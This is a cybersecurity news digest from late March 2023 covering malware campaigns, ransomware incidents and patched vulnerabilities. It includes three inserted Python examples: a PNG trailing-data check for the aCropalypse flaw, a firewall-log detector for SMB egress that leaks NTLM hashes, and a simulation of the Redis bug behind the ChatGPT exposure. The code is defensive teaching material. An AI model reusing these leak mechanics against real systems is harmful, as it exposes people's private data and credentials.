A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed DBatLoader. "The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report published Monday. The findings build upon a previous report from SentinelOne last month that detailed phishing emails containing malicious attachments that masquerade as financial documents to activate the infection chain. Some of the file formats used to distribute the DBatLoader payload concern the use of a multi-layered obfuscated HTML file and OneNote attachments. The development adds to growing abuse of OneNote files as an initial vector for malware distribution since late last year in response to Microsoft's decision to block macros by default in files downloaded fThe Hacker News
March 28, 2023 – Attack
Telecom giant Lumen suffered a ransomware attack and discloses a second incident Full Text
Abstract
Telecommunications giant Lumen Technologies discovered two cybersecurity incidents, including a ransomware attack. In a filing to the Securities and Exchange Commission, on March 27, 2023, Lumen announced two cybersecurity incidents. One of the incidents...Security Affairs
March 28, 2023 – Breach
Crown Resorts says ransomware group claims accessing some of its files Full Text
Abstract
"We were recently contacted by a ransomware group who claimed they have illegally obtained a limited number of Crown files," a spokesperson of the formerly listed firm said in a statement.Cyware
March 28, 2023 – Government
President Biden Signs Executive Order Restricting Use of Commercial Spyware Full Text
Abstract
U.S. President Joe Biden on Monday signed an executive order that restricts the use of commercial spyware by federal government agencies. The order said the spyware ecosystem "poses significant counterintelligence or security risks to the United States Government or significant risks of improper use by a foreign government or foreign person." It also seeks to ensure that the government's use of such tools is done in a manner that's "consistent with respect for the rule of law, human rights, and democratic norms and values." To that end, the order lays out the various criteria under which commercial spyware could be disqualified for use by U.S. government agencies. They include - The purchase of commercial spyware by a foreign government or person to target the U.S. government, A commercial spyware vendor that uses or discloses sensitive data obtained from the cyber surveillance tool without authorization and operates under the control of a foreign gThe Hacker News
March 28, 2023 – Criminals
Europol details ChatGPT’s potential for criminal abuse Full Text
Abstract
ChatGPT’s ability to draft highly realistic text makes it a useful tool for phishing purposes. In addition to generating human-like language, ChatGPT is capable of producing code in a number of different programming languages.Cyware
March 28, 2023 – Vulnerabilities
Apple Issues Urgent Security Update for Older iOS and iPadOS Models Full Text
Abstract
Apple on Monday backported fixes for an actively exploited security flaw to older iPhone and iPad models. The issue, tracked as CVE-2023-23529, concerns a type confusion bug in the WebKit browser engine that could lead to arbitrary code execution. It was originally addressed by the tech giant with improved checks as part of updates released on February 13, 2023. An anonymous researcher has been credited with reporting the bug. "Processing maliciously crafted web content may lead to arbitrary code execution," Apple said in a new advisory, adding it's "aware of a report that this issue may have been actively exploited." Details surrounding the exact nature of exploitation are currently not known, but withholding technical specifics is standard procedure as it helps prevent additional in-the-wild abuse targeting susceptible devices. The update is available in versions iOS 15.7.4 and iPadOS 15.7.4 for iPhone 6s (all models), iPhone 7 (all models), iPhoThe Hacker News
March 28, 2023 – Malware
DBatLoader Actively Distributing Malware Targeting European Businesses Full Text
Abstract
The campaign targets manufacturing companies and multiple businesses in European countries through phishing emails. The malicious payload is distributed through WordPress sites with authorized SSL certificates.Cyware
March 28, 2023 – Education
Balancing security risks and innovation potential of shadow IT teams Full Text
Abstract
Shadow IT teams, also known as rogue IT teams, have grown in popularity in recent years due to the rise of cloud-based apps and remote work. However, this has led to operational tension and security risks within many businesses.Cyware
March 27, 2023 – Attack
Operation Tainted Love: New Cyberespionage Campaign by Chinese Full Text
Abstract
A Chinese cyber-espionage campaign, named Operation Tainted Love and associated with Operation Soft Cell, has been found hitting telecommunications providers in the Middle East since Q1 2023. The campaign relies heavily on a custom credential-theft tool, mim221.Cyware
March 27, 2023 – Policy and Law
20-Year-Old BreachForums Founder Faces Up to 5 Years in Prison Full Text
Abstract
Conor Brian Fitzpatrick, the 20-year-old founder and administrator of the now-defunct BreachForums, has been formally charged in the U.S. with conspiracy to commit access device fraud. If convicted, Fitzpatrick, who went by the online moniker "pompompurin," faces a maximum penalty of up to five years in prison. He was arrested on March 15, 2023. "Cybercrime victimizes and steals financial and personal information from millions of innocent people," said U.S. Attorney Jessica D. Aber for the Eastern District of Virginia. "This arrest sends a direct message to cybercriminals: your exploitative and illegal conduct will be discovered, and you will be brought to justice." The development comes days after Baphomet, the individual who had taken over the responsibilities of BreachForums, shut down the website, citing concerns that law enforcement may have obtained access to its backend. The Department of Justice (DoJ) has since confirmed that it coThe Hacker News
March 27, 2023 – Vulnerabilities
Apple fixes recently disclosed CVE-2023-23529 zero-day on older devices Full Text
Abstract
Apple released updates to backport security patches that address actively exploited CVE-2023-23529 WebKit zero-day for older iPhones and iPads. Apple released security updates to backport patches that address an actively exploited zero-day flaw (CVE-2023-23529)...Security Affairs
March 27, 2023 – Hacker
REF2924 Brings a New Weapon NAPLISTENER to the Table Full Text
Abstract
The REF2924 threat cluster was observed dropping a previously-unseen malware, dubbed NAPLISTENER, on entities in Southeast and South Asia. The malware evades network-based forms of detection. Actors target Microsoft Exchange Servers exposed to the internet to deploy several backdoors, includin ...Cyware
March 27, 2023 – General
Where SSO Falls Short in Protecting SaaS Full Text
Abstract
Single sign-on (SSO) is an authentication method that allows users to authenticate their identity for multiple applications with just one set of credentials. From a security standpoint, SSO is the gold standard. It ensures access without forcing users to remember multiple passwords and can be further secured with MFA. Furthermore, an estimated 61% of attacks stem from stolen credentials. By removing usernames and passwords, the attack surface is reduced as well. SSO helps companies meet strict compliance regulations by not only enabling businesses to secure their accounts, but by helping them demonstrate that they've taken the necessary steps to meet regulatory requirements. While SSO is an important step in securing SaaS apps and their data, having just SSO in place to secure the SaaS stack in its entirety is not enough. SSO alone won't prevent a threat actor from accessing a SaaS app. It also won't protect SaaS apps that are onboarded without the IT team's knowledgThe Hacker News
March 27, 2023 – Malware
New MacStealer macOS malware appears in the cybercrime underground Full Text
Abstract
A new MacStealer macOS malware allows operators to steal iCloud Keychain data and passwords from infected systems. Uptycs researchers team discovered a new macOS information stealer, called MacStealer, which allows operators to steal iCloud Keychain...Security Affairs
March 27, 2023 – General
Pwn2Own Vancouver 2023 awarded $1,035,000 and a Tesla for 27 0-days Full Text
Abstract
On the third day, contestants were awarded $185,000 after demonstrating 5 zero-day exploits targeting the Ubuntu Desktop, Windows 11, and the VMware Workstation software.Cyware
March 27, 2023 – Malware
New MacStealer macOS Malware Steals iCloud Keychain Data and Passwords Full Text
Abstract
A new information-stealing malware has set its sights on Apple's macOS operating system to siphon sensitive information from compromised devices. Dubbed MacStealer, it's the latest example of a threat that uses Telegram as a command-and-control (C2) platform to exfiltrate data. It primarily affects devices running macOS versions Catalina and later running on M1 and M2 CPUs. "MacStealer has the ability to steal documents, cookies from the victim's browser, and login information," Uptycs researchers Shilpesh Trivedi and Pratik Jeware said in a new report. First advertised on online hacking forums at the start of the month, it is still a work in progress, with the malware authors planning to add features to capture data from Apple's Safari browser and the Notes app. In its current form, MacStealer is designed to extract iCloud Keychain data, passwords and credit card information from browsers like Google Chrome, Mozilla Firefox, and Brave. It also featurThe Hacker News
March 27, 2023 – Malware
Updates from the MaaS: new threats delivered through NullMixer Full Text
Abstract
A technical analysis of NullMixer malware operation revealed Italy and France are the favorite European countries from the attackers' perspective. Executive Summary: Our insights into a recent NullMixer malware operation revealed Italy and France...Security Affairs
March 27, 2023 – Breach
Twitter says source code was leaked on GitHub, now it’s trying to find the culprit Full Text
Abstract
Parts of Twitter’s source code were recently leaked online via GitHub, the New York Times reports, but were taken down after the social media platform filed a DMCA request.Cyware
March 27, 2023 – Vulnerabilities
Microsoft Issues Patch for aCropalypse Privacy Flaw in Windows Screenshot Tools Full Text
Abstract
Microsoft has released an out-of-band update to address a privacy-defeating flaw in its screenshot editing tool for Windows 10 and Windows 11. The issue, dubbed aCropalypse, could enable malicious actors to recover edited portions of screenshots, potentially revealing sensitive information that may have been cropped out. Tracked as CVE-2023-28303, the vulnerability is rated 3.3 on the CVSS scoring system. It affects both the Snip & Sketch app on Windows 10 and the Snipping Tool on Windows 11. "The severity of this vulnerability is Low because successful exploitation requires uncommon user interaction and several factors outside of an attacker's control," Microsoft said in an advisory released on March 24, 2023. Successful exploitation requires that the following two prerequisites are met - The user must take a screenshot, save it to a file, modify the file (for example, crop it), and then save the modified file to the same location. The user must openThe Hacker News
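The prerequisite above (save, crop, save back to the same path) matters because the underlying defect in the aCropalypse family of bugs is that the editor rewrites the file in place without truncating it, so when the cropped PNG is shorter than the original, the tail of the original image data stays on disk after the IEND chunk. Image viewers stop at IEND and never show it. The following added example is editorial, not code from Microsoft or the researchers who reported the bug: it builds a constructed PNG, models the non-truncating overwrite, and walks the chunk list to count the leftover bytes, which is the check an incident responder can run over a directory of shared screenshots.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_png(width: int, height: int) -> bytes:
    """Build an 8-bit RGB PNG filled with a gradient so IDAT size scales with the image.
    Constructed test data standing in for a saved screenshot."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 (RGB)
    rows = []
    for y in range(height):
        row = bytearray(b"\x00")  # filter type 0 (None) at the start of each scanline
        for x in range(width):
            row += bytes(((x * 7) & 0xFF, (y * 5) & 0xFF, (x ^ y) & 0xFF))
        rows.append(bytes(row))
    idat = zlib.compress(b"".join(rows))
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def iend_end_offset(data: bytes) -> int:
    """Walk the chunk list as a decoder does and return the offset just past IEND.
    Decoders stop here, so anything beyond it is invisible in a viewer."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4  # header + data + CRC
        if end > len(data):
            raise ValueError("truncated chunk")
        if ctype == b"IEND":
            return end
        pos = end
    raise ValueError("no IEND chunk found")


def trailing_bytes(data: bytes) -> bytes:
    """Bytes after IEND: empty for a cleanly written file, leftover image data otherwise."""
    return data[iend_end_offset(data):]


def overwrite_without_truncate(original: bytes, edited: bytes) -> bytes:
    """Model the bug: the editor rewrites the file in place but never truncates it,
    so when the edited file is shorter the tail of the original survives on disk."""
    if len(edited) >= len(original):
        return edited
    return edited + original[len(edited):]


if __name__ == "__main__":
    original = make_png(64, 64)
    cropped = make_png(8, 8)
    on_disk = overwrite_without_truncate(original, cropped)
    print(f"clean crop: {len(trailing_bytes(cropped))} trailing bytes")
    print(f"in-place overwrite: {len(trailing_bytes(on_disk))} bytes of the original left after IEND")
```

Any non-zero trailing length on a screenshot is worth treating as a potential disclosure; the leftover bytes are the compressed tail of the original IDAT stream, which is what the public recovery tooling reconstructs pixels from.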
March 27, 2023 – APT
Technical analysis of China-linked Earth Preta APT’s infection chain Full Text
Abstract
China-linked Earth Preta cyberespionage group has been observed adopting new techniques to bypass security solutions. Trend Micro researchers reported that the China-linked Earth Preta group (aka Mustang Panda) is actively changing its tools, tactics,...Security Affairs
March 27, 2023 – Criminals
The FBI’s BreachForums bust is causing ‘chaos in the cybercrime underground’ Full Text
Abstract
On March 16, 2022, about a month after the FBI took down a popular online forum for buying and selling stolen data known as RaidForums, another criminal marketplace quickly sprung up to take its place.Cyware
March 27, 2023 – Malware
Malicious Python Package uses Unicode support to evade detection Full Text
Abstract
Researchers discovered a malicious package on PyPI that uses Unicode to evade detection while stealing sensitive data. Supply chain security firm Phylum discovered a malicious Python package on the Python Package Index (PyPI) repository that uses...Security Affairs
March 27, 2023 – Government
CISA Ships ‘Untitled Goose Tool’ to Hunt for Microsoft Azure Cloud Infections Full Text
Abstract
Azure network defenders can use the tool to export and review sign-in audit logs and activity alerts from a range of Azure and Microsoft Defender environments to pinpoint signs of suspicious activity.Cyware
March 27, 2023 – Attack
Hackers Attack Wisconsin Court System Computer Network Full Text
Abstract
The attack has not resulted in the breach of any data and court operations are continuing as usual statewide, state Supreme Court Chief Justice Annette Ziegler said in a statement.Cyware
March 26, 2023 – Breach
OpenAI: A Redis bug caused a recent ChatGPT data exposure incident Full Text
Abstract
OpenAI revealed that a Redis bug was the root cause of the recent exposure of users' personal information and chat titles in ChatGPT service. On Friday, OpenAI revealed that the recent exposure of users' personal information and chat titles in its chatbot...Security Affairs
March 26, 2023 – General
Security Affairs newsletter Round 412 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. NCA...Security Affairs
March 26, 2023 – Vulnerabilities
Microsoft shares guidance for investigating attacks exploiting CVE-2023-23397 Full Text
Abstract
Microsoft is warning of cyber attacks exploiting a recently patched Outlook vulnerability tracked as CVE-2023-23397 (CVSS score: 9.8). Microsoft published guidance for investigating attacks exploiting recently patched Outlook vulnerability tracked...Security Affairs
March 26, 2023 – Attack
Vice Society claims attack on Puerto Rico Aqueduct and Sewer Authority Full Text
Abstract
Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyber attack with the help of the FBI and US CISA. The Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyberattack that last week hit the agency. The agency quickly...Security Affairs
March 25, 2023 – Vulnerabilities
Critical flaw in AI testing framework MLflow can lead to server and data compromise Full Text
Abstract
The vulnerability found by Dan McInerney is tracked as CVE-2023-1177 and is rated 10 (critical) on the CVSS scale. It is described as a local and remote file inclusion (LFI/RFI) via the API.Cyware
March 25, 2023 – Criminals
U.K. National Crime Agency Sets Up Fake DDoS-For-Hire Sites to Catch Cybercriminals Full Text
Abstract
In what's a case of setting a thief to catch a thief, the U.K. National Crime Agency (NCA) revealed that it has created a network of fake DDoS-for-hire websites to infiltrate the online criminal underground. "All of the NCA-run sites, which have so far been accessed by around several thousand people, have been created to look like they offer the tools and services that enable cyber criminals to execute these attacks," the law enforcement agency said. "However, after users register, rather than being given access to cyber crime tools, their data is collated by investigators." The effort is part of an ongoing international joint effort called Operation PowerOFF in collaboration with authorities from the U.S., the Netherlands, Germany, Poland, and Europol aimed at dismantling criminal DDoS-for-hire infrastructures worldwide. DDoS-for-hire (aka "Booter" or "Stresser") services rent out access to a network of infected devices to other crimThe Hacker News
March 25, 2023 – Business
Cork-based Dope Security lands $16m investment Full Text
Abstract
The Series A funding round was led by Google Ventures (GV), with participation from existing investors Boldstart Ventures and Preface. The company plans to use some of the funding to expand its engineering team in Cork.Cyware
March 25, 2023 – Vulnerabilities
Microsoft Warns of Stealthy Outlook Vulnerability Exploited by Russian Hackers Full Text
Abstract
Microsoft on Friday shared guidance to help customers discover indicators of compromise (IoCs) associated with a recently patched Outlook vulnerability. Tracked as CVE-2023-23397 (CVSS score: 9.8), the critical flaw relates to a case of privilege escalation that could be exploited to steal NT LAN Manager (NTLM) hashes and stage a relay attack without requiring any user interaction. "External attackers could send specially crafted emails that will cause a connection from the victim to an untrusted location of attackers' control," the company noted in an advisory released this month. "This will leak the Net-NTLMv2 hash of the victim to the untrusted network which an attacker can then relay to another service and authenticate as the victim." The vulnerability was resolved by Microsoft as part of its Patch Tuesday updates for March 2023, but not before Russia-based threat actors weaponized the flaw in attacks targeting government, transportation, eneThe Hacker News
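The two CVE-2023-23397 items above describe the observable side effect rather than the trigger: a workstation opening an authenticated connection to an address the attacker controls, which leaks the Net-NTLMv2 response. Because that happens with no user interaction, the network edge is the one place every affected host is visible. The following is an added example by the editor, not Microsoft's published hunting script: it runs a simple egress check over constructed firewall log lines, flagging internal hosts that opened SMB sessions (TCP 445, or 139 for SMB over NetBIOS) to addresses outside an assumed RFC 1918 estate. The log format, the address ranges and the assumption that the leaking connection is SMB are all this example's own; adapt them to your own telemetry.

```python
import ipaddress
import re
from collections import Counter
from typing import Dict, List

# Constructed firewall log sample in key=value style (not real traffic).
SAMPLE_LOG = """\
2023-03-20T10:01:02Z src=10.0.5.23 dst=10.0.9.8 dport=445 proto=tcp action=allow
2023-03-20T10:01:40Z src=10.0.5.23 dst=203.0.113.7 dport=445 proto=tcp action=allow
2023-03-20T10:02:11Z src=10.0.5.31 dst=198.51.100.21 dport=443 proto=tcp action=allow
2023-03-20T10:03:05Z src=10.0.5.44 dst=198.51.100.21 dport=445 proto=tcp action=deny
2023-03-20T10:04:19Z src=10.0.5.23 dst=192.0.2.10 dport=139 proto=tcp action=allow
"""

# Assumed internal address space (RFC 1918 plus loopback); replace with the real estate.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
SMB_PORTS = {445, 139}  # direct SMB and SMB over the NetBIOS session service

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Dict[str, str]:
    """Split 'timestamp k=v k=v ...' into a dict; the timestamp is stored under 'ts'."""
    ts, _, rest = line.partition(" ")
    event = dict(KV_RE.findall(rest))
    event["ts"] = ts
    return event


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def find_smb_egress(log: str, include_denied: bool = False) -> List[Dict[str, str]]:
    """Return events where an internal host opened an SMB session to an external address.
    Denied attempts are still interesting (the host tried), so they can be included."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        try:
            if int(ev.get("dport", "-1")) not in SMB_PORTS:
                continue
        except ValueError:
            continue
        if not is_internal(ev["src"]) or is_internal(ev["dst"]):
            continue
        if ev.get("action") == "deny" and not include_denied:
            continue
        hits.append(ev)
    return hits


def hosts_by_hits(events: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged sessions per source host: repeat offenders are the ones to image first."""
    return dict(Counter(ev["src"] for ev in events))


if __name__ == "__main__":
    for ev in find_smb_egress(SAMPLE_LOG, include_denied=True):
        print(f"{ev['ts']} {ev['src']} -> {ev['dst']}:{ev['dport']} ({ev['action']})")
    print(hosts_by_hits(find_smb_egress(SAMPLE_LOG)))
```

A host that shows up here is a candidate for the mailbox-side check Microsoft's guidance describes; the egress record alone does not prove the Outlook path was the trigger, but an allowed outbound 445 session to the Internet is the condition that lets the hash leave the building and is the rule most organisations should be enforcing regardless.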
March 25, 2023 – Phishing
New Instagram scam uses fake SHEIN gift cards as lure Full Text
Abstract
This social media scam begins with a comment from a random account on a user’s post, which congratulates the victim saying they’re one of the 2023 lucky ones selected to receive a SHEIN gift card.Cyware
March 25, 2023 – Breach
OpenAI Reveals Redis Bug Behind ChatGPT User Data Exposure Incident Full Text
Abstract
OpenAI on Friday disclosed that a bug in the Redis open source library was responsible for the exposure of other users' personal information and chat titles in the upstart's ChatGPT service earlier this week. The glitch, which came to light on March 20, 2023, enabled certain users to view brief descriptions of other users' conversations from the chat history sidebar, prompting the company to temporarily shut down the chatbot. "It's also possible that the first message of a newly-created conversation was visible in someone else's chat history if both users were active around the same time," the company said. The bug, it further added, originated in the redis-py library, leading to a scenario where canceled requests could cause connections to be corrupted and return unexpected data from the database cache, in this case, information belonging to an unrelated user. To make matters worse, the San Francisco-based AI research company said it introduceThe Hacker News
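The failure mode in both OpenAI items is easy to state but worth seeing: a Redis connection carries replies back strictly in request order with no request identifier, so if a client writes a command and is cancelled before reading the reply, that reply is still sitting on the socket when the pooled connection is handed to the next caller, who reads it as the answer to their own command. The following added example is the editor's simulation of that sequence, not redis-py's code or OpenAI's fix: a fake connection with in-order replies, an unsafe client that leaves the reply queued on cancellation, and a safe client that discards the connection instead. The cache contents and key names are constructed.

```python
import asyncio
from typing import Awaitable, Callable, Dict, List

# Constructed cache contents standing in for per-user chat metadata.
CACHE: Dict[str, str] = {
    "chat_title:alice": "Alice: merger due-diligence notes",
    "chat_title:bob": "Bob: weekend trip ideas",
}


class FakeRedisConnection:
    """Stand-in for one pooled connection. As on a real RESP socket, replies come back
    strictly in the order the requests were written; nothing on the wire ties a reply
    to the coroutine that asked for it."""

    def __init__(self, store: Dict[str, str]):
        self._store = store
        self._unread: List[str] = []   # replies the server has sent that nobody has read yet
        self.reconnects = 0

    async def write_get(self, key: str) -> None:
        await asyncio.sleep(0)         # yield, as a real socket write would
        self._unread.append(self._store.get(key, "(nil)"))

    async def read_reply(self) -> str:
        await asyncio.sleep(0.2)       # network latency: this is where cancellation lands
        return self._unread.pop(0)

    def disconnect(self) -> None:
        """Drop the socket; a fresh connection has no stale replies queued on it."""
        self._unread.clear()
        self.reconnects += 1


async def get_unsafe(conn: FakeRedisConnection, key: str) -> str:
    # Cancelled between write and read, the reply stays queued on the shared connection
    # and the next caller reads it as if it were their own.
    await conn.write_get(key)
    return await conn.read_reply()


async def get_safe(conn: FakeRedisConnection, key: str) -> str:
    await conn.write_get(key)
    try:
        return await conn.read_reply()
    except asyncio.CancelledError:
        conn.disconnect()              # never return a half-used connection to the pool
        raise


async def _scenario(get: Callable[[FakeRedisConnection, str], Awaitable[str]]) -> str:
    conn = FakeRedisConnection(CACHE)
    alice = asyncio.create_task(get(conn, "chat_title:alice"))
    await asyncio.sleep(0.02)          # Alice's command is written and waiting on the reply
    alice.cancel()                     # her HTTP request is aborted mid-read
    try:
        await alice
    except asyncio.CancelledError:
        pass
    return await get(conn, "chat_title:bob")   # Bob reuses the same pooled connection


def bob_sees_with_unsafe_client() -> str:
    return asyncio.run(_scenario(get_unsafe))


def bob_sees_with_safe_client() -> str:
    return asyncio.run(_scenario(get_safe))


if __name__ == "__main__":
    print("unsafe client, Bob reads:", bob_sees_with_unsafe_client())
    print("safe client, Bob reads:  ", bob_sees_with_safe_client())
```

The general lesson is not specific to Redis: any client that multiplexes a shared, ordered connection must treat cancellation during a read as connection-poisoning and close the connection, because the protocol gives it no way to resynchronise.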
March 25, 2023 – Government
TikTok CEO got grilled by lawmakers from both parties on whether the Chinese-owned app can protect American privacy Full Text
Abstract
TikTok CEO Shou Zi Chew’s testimony did not seem to quell many concerns that lawmakers had about the company’s connections to China or the adequacy of its risk-mitigation plan, Project Texas.Cyware
March 25, 2023 – Breach
Kroger Postal Prescription Services Files Notice of Data Breach Impacting 82,466 Consumers Full Text
Abstract
Upon discovering that sensitive consumer data was made available to an unauthorized party, Kroger Postal Prescription Services began to review the affected files to determine what information was compromised and which consumers were impacted.Cyware
March 25, 2023 – Criminals
NCA infiltrates the cybercriminal underground with fake DDoS-for-hire sites Full Text
Abstract
The U.K. National Crime Agency (NCA) revealed that it has set up a number of fake DDoS-for-hire sites to infiltrate the online criminal underground. The UK National Crime Agency announced it has infiltrated the online criminal marketplace by setting...Security Affairs
March 25, 2023 – Business
Britive, which helps secure public clouds, lands $20.5M investment Full Text
Abstract
Led by Pelion Venture Partners with participation from Liberty Global Ventures, Crosslink Capital and One Way Ventures, the new round brings Britive's total raised to $36 million.Cyware
March 25, 2023 – General
Pwn2Own Vancouver 2023 awarded $1,035,000 and a Tesla for 27 0-days Full Text
Abstract
On the third day of the Pwn2Own Vancouver 2023 hacking contest, the organization awarded $185,000 for 10 zero-day exploits. Pwn2Own Vancouver 2023 has ended; contestants disclosed 27 unique zero-days and the organization awarded a total of $1,035,000...Security Affairs
March 25, 2023 – General
Pwn2Own Vancouver 2023 Day 2: Microsoft Teams, Oracle VirtualBox, and Tesla hacked Full Text
Abstract
On the second day of Pwn2Own Vancouver 2023, the bug hunters demonstrated zero-day attacks against the Oracle VirtualBox virtualization platform, Microsoft Teams, Tesla Model 3, and the Ubuntu Desktop OS.Cyware
March 25, 2023 – General
Pwn2Own Vancouver 2023 Day 1: Windows 11 and Tesla hacked Full Text
Abstract
Pwn2Own Vancouver 2023 has begun; this hacking competition has 19 entries targeting nine different targets, including two Tesla attempts. On the first day, it awarded $375,000 (and a Tesla Model 3) for 12 zero-day vulnerabilities discovered.Cyware
March 24, 2023 – Breach
Malicious JavaScript Injection Campaign Infects 51,000 Websites Full Text
Abstract
Unit 42 researchers have been tracking a widespread malicious JavaScript (JS) injection campaign that redirects victims to malicious content such as adware and scam pages.Cyware
March 24, 2023 – Malware
Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data Full Text
Abstract
A malicious Python package on the Python Package Index (PyPI) repository has been found to use Unicode as a trick to evade detection and deploy info-stealing malware. The package in question, named onyxproxy, was uploaded to PyPI on March 15, 2023, and comes with capabilities to harvest and exfiltrate credentials and other valuable data. It has since been taken down, but not before attracting a total of 183 downloads. According to software supply chain security firm Phylum, the package incorporates its malicious behavior in a setup script that's packed with thousands of seemingly legitimate code strings. These strings include a mix of bold and italic fonts and are still readable and can be parsed by the Python interpreter, only to activate the execution of the stealer malware upon installation of the package. "An obvious and immediate benefit of this strange scheme is readability," the company noted. "Moreover, these visible differences do not preventThe Hacker News
March 24, 2023 – Policy and Law
Export Control is Not a Magic Bullet for Cyber Mercenaries Full Text
Abstract
The U.S. and the EU need to do more to limit the damage to their intelligence and law enforcement capabilities caused by cyber mercenaries.Lawfare
March 24, 2023 – Government
CISA announced the Pre-Ransomware Notifications initiative Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) announced the Pre-Ransomware Notifications service to help organizations stop ransomware attacks before damage occurs. The US Cybersecurity and Infrastructure Security Agency announced...Security Affairs
March 24, 2023 – Phishing
Fake IRS tax email delivers Emotet malware Full Text
Abstract
In this case, Form W-9 is being used as a lure for people to download something sinister. The attachment, W-9 form.zip, is 709 KB in size. Opening the attachment reveals a Word document called W-9 form.doc that is over 500MB in size.Cyware
March 24, 2023 – Education
THN Webinar: Inside the High Risk of 3rd-Party SaaS Apps Full Text
Abstract
Any app that can improve business operations is quickly added to the SaaS stack. However, employees don't realize that this SaaS-to-SaaS connectivity, which typically takes place outside the view of the security team, significantly increases risk. Whether employees connect through Microsoft 365, Google Workspace, Slack, Salesforce, or any other app, security teams have no way to quantify their exposure. These 'secondary' apps can be requesting an intrusive set of permissions or be malicious. Every click authorizing access may grant the right to edit or delete company files, send emails on behalf of the user, create new files, or otherwise handle data in a way that poses a profound threat to the organization's security. To handle the SaaS Security challenges, security teams need to address the entire SaaS ecosystem. Today's SaaS security evolution has expanded SaaS security beyond simply preventing access. It extends far beyond securing the app. Today's orgaThe Hacker News
March 24, 2023 – Hacker
China-linked hackers target telecommunication providers in the Middle East Full Text
Abstract
Researchers reported that China-linked hackers targeted telecommunication providers in the Middle East in the first quarter of 2023. In the first quarter of 2023, SentinelLabs researchers spotted the initial phases of attacks against telecommunication...Security Affairs
March 24, 2023 – Skimming
A look at a Magecart skimmer using the Hunter obfuscator Full Text
Abstract
When a victim who is shopping at a compromised online store goes to the checkout page, there will be additional fields injected in the contact form that aren't normally there.Cyware
March 24, 2023 – General
GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations Full Text
Abstract
Cloud-based repository hosting service GitHub said it took the step of replacing its RSA SSH host key used to secure Git operations "out of an abundance of caution" after it was briefly exposed in a public repository. The activity, which was carried out at 05:00 UTC on March 24, 2023, is said to have been undertaken as a measure to prevent any bad actor from impersonating the service or eavesdropping on users' operations over SSH. "This key does not grant access to GitHub's infrastructure or customer data," Mike Hanley, chief security officer and SVP of engineering at GitHub, said in a post. "This change only impacts Git operations over SSH using RSA." The move does not impact Web traffic to GitHub.com and Git operations performed via HTTPS. No change is required for ECDSA or Ed25519 users. The Microsoft-owned company said there is no evidence that the exposed SSH private key was exploited by adversaries. It further emphasized that the &quThe Hacker News
March 24, 2023 – Attack
City of Toronto is one of the victims hacked by Clop gang using GoAnywhere zero-day Full Text
Abstract
Clop ransomware gang added the City of Toronto to the list of its victims; it is another organization compromised by exploiting the GoAnywhere zero-day. Clop ransomware gang added the City of Toronto to the list of victims published on its Tor leak...Security Affairs
March 24, 2023 – Hacker
Russian Hackers Deploy New AresLoader Malware via Decoy Installers Full Text
Abstract
The malicious program appears to be developed and used by several members of a pro-Russia hacktivist group and is typically distributed inside decoy installers for legitimate software.Cyware
March 24, 2023 – Hacker
Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies Full Text
Abstract
A recent campaign undertaken by Earth Preta indicates that nation-state groups aligned with China are getting increasingly proficient at bypassing security solutions. The threat actor, active since at least 2012, is tracked by the broader cybersecurity community under Bronze President, HoneyMyte, Mustang Panda, RedDelta, and Red Lich. Attack chains mounted by the group commence with a spear-phishing email to deploy a wide range of tools for backdoor access, command-and-control (C2), and data exfiltration. These messages come bearing malicious lure archives distributed via Dropbox or Google Drive links that employ DLL side-loading, LNK shortcut files, and fake file extensions as arrival vectors to obtain a foothold and drop backdoors like TONEINS, TONESHELL, PUBLOAD, and MQsTTang (aka QMAGENT). Similar infection chains utilizing Google Drive links have been observed delivering Cobalt Strike as early as April 2021. "Earth Preta tends to hide malicious payloadsThe Hacker News
March 24, 2023 – Vulnerabilities
Critical flaw in WooCommerce Payments plugin allows site takeover Full Text
Abstract
A patch for a critical vulnerability in the WooCommerce Payments plugin for WordPress has been released for over 500,000 websites. On March 23, 2023, researchers from Wordfence observed that the “WooCommerce Payments – Fully Integrated Solution...Security Affairs
March 24, 2023 – Attack
City of Toronto and Financing Firm Investissement Québec Confirm Being Hit by Ransomware Attack Full Text
Abstract
“Today, the City of Toronto has confirmed that unauthorized access to City data did occur through a third party vendor. The access is limited to files that were unable to be processed through the third-party secure file transfer system,” it said.Cyware
March 24, 2023 – Vulnerabilities
Critical WooCommerce Payments Plugin Flaw Patched for 500,000+ WordPress Sites Full Text
Abstract
